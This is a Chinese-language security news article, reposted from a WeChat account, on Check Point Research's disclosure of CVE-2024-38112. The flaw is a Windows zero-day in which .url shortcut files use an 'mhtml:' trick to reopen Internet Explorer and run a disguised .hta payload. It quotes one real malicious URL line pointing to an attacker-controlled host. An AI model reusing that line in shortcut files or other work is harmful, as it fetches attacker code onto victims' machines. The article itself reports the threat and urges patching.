Check Point Research 披露威胁 Windows 用户的0day漏洞 (CVE-2024-38112)

admin 2024年7月10日11:57:33评论22 views字数 1248阅读4分9秒阅读模式

Check Point Research 的网络安全研究人员发现了一种新型零日漏洞,该漏洞利用看似无害的 Windows Internet 快捷方式文件 (.url) 来攻击毫无戒备的用户。这种复杂的攻击使早已停用的 Internet Explorer (IE) 浏览器复活,为在最新的 Windows 10 和 11 操作系统上执行恶意代码打开了大门。

攻击者使用 .url 文件,这些文件通常用作网站的快捷方式。然而,在这种情况下,它们被精心设计来调用 Internet Explorer(这是微软因存在大量安全漏洞而停用的浏览器。)威胁行为者巧妙地在 URL 字符串中使用了“mhtml”技巧来掩盖恶意意图。

Check Point Research 披露威胁 Windows 用户的0day漏洞 (CVE-2024-38112)

恶意 .url 样本的内容 | 图片:Check Point

这种方法并不完全是新的。它是之前在 CVE-2021-40444 0day攻击中使用的一种技术,其中 Word 文档中的类似字符串利用了漏洞。这里,.url 文件包含:

mhtml:http://cbmelipilla.cl/te/test1.html!x-usc:http://cbmelipilla.cl/te/test1.html

这种特殊的格式会诱使系统使用 IE 而不是更安全的浏览器打开 URL。这种方法至少从 2023 年 1 月开始活跃,最新的样本是在 2024 年 5 月 13 日观察到的。

Check Point Research 披露威胁 Windows 用户的0day漏洞 (CVE-2024-38112)

当受害者双击 .url 文件时,会出现 IE 和升级窗口对话框 | 图片:Check Point

一旦启动 IE,漏洞就会利用浏览器过时的安全功能。攻击者采用进一步的技巧,将恶意 .hta(HTML 应用程序)文件伪装成 PDF,绕过安全警告,导致在受害者的计算机上执行有害代码。

微软已在 2024 年 7 月补丁星期二更新中解决了该0day漏洞(编号为CVE-2024-38112 )。强烈建议 Windows 用户立即应用此补丁来保护其系统。

强烈建议 Windows 用户立即应用最新的安全补丁。此外,保持警惕至关重要,尤其是对于来自不受信任来源的 .url 文件。虽然这种攻击媒介需要多次用户交互才能成功,但安全意识和谨慎可以防止被利用。

微软 2024 年 7 月补丁星期二修复了 142 个漏洞,包括 5 个严重漏洞和 134 个重要严重漏洞。除了 CVE-2024-38112 之外,微软还修复了其他 3 个已知在野利用的0day漏洞( CVE-2024-38080、CVE-2024-35264、CVE-2024-37985 )。

如需了解更详细的技术见解,请访问Check Point Research 的官方博客

https://research.checkpoint.com/2024/resurrecting-internet-explorer-threat-actors-using-zero-day-tricks-in-internet-shortcut-file-to-lure-victims-cve-2024-38112/

原文始发于微信公众号(独眼情报):Check Point Research 披露威胁 Windows 用户的0day漏洞 (CVE-2024-38112)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月10日11:57:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Check Point Research 披露威胁 Windows 用户的0day漏洞 (CVE-2024-38112)https://cn-sec.com/archives/2938658.html

发表评论

匿名网友 填写信息